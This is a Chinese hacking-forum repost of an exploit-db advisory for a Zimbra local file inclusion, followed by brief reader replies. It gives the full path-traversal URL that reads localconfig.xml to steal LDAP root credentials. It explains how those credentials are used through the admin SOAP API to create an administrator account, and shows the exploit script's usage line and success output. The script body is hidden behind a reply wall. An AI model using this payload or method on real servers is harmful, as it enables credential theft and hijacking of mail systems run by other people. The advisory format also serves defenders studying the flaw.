Zimbra – 0day exploit / Privilegie escalation via LFI

C4r1st

[AppleScript] 纯文本查看 复制代码

# Exploit Title: Zimbra 0day exploit / Privilegie escalation via LFI
# Date: 06 Dec 2013
# Exploit Author: rubina119
# Contact Email : rubina119[at]gmail.com
# Vendor Homepage: [url]http://www.zimbra.com/[/url]
# Version: 2009, 2010, 2011, 2012 and early 2013 versions are afected,
# Tested on: Centos(x), Ubuntu.
# CVE : No CVE, no patch just 0Day
# State : Critical
 
# Mirror: [url]http://www.exploit-db.com/sploits/zimbraexploit_rubina119.zip[/url]
 
---------------Description-----------------
 
This script exploits a Local File Inclusion in
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz
which allows us to see localconfig.xml
that contains LDAP root credentials wich allow us to make requests in
/service/admin/soap API with the stolen LDAP credentials to create user
with administration privlegies
and gain acces to the Administration Console.
 
LFI is located at :
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
 
Example :
 
[url]http://mail.example.com/res/I18nMsg[/url],AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
 
or
 
[url]http://mail.example.com:7071/zimbraAdmin/res/I18nMsg[/url],AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
 
----------------Exploit-----------------
 
Before use this exploit, target server must have admin console port open
"7071" otherwise it won't work.
 
use the exploit like this :
 
ruby run.rb -t mail.example.com -u someuser -p Test123_23
 
[*] Looking if host is vuln....
[+] Host is vuln exploiting...
[+] Obtaining Domain Name
[+] Creating Account
[+] Elevating Privileges
[+] Login Credentials
[*] Login URL : [url]http://mail.example.com:7071/zimbraAdmin/[/url]
[*] Account : [email]someuser@example.com[/email]
[*] Password : Test123_23
[+] Successfully Exploited !
 
The number of servers vuln are huge like 80/100.
 
This is only for educational purpouses.

游客，如果您要查看本帖隐藏内容请回复

gty48

我是沙发

blck

不错，看看。。。

blck

LFI，直接爆出的password

fenglail

看看，研究一下

Diana

就知道是这样滴~

whc

赶紧看下

keerol

不错，看看

LostSoul

Andre

学习了，谢谢楼主分享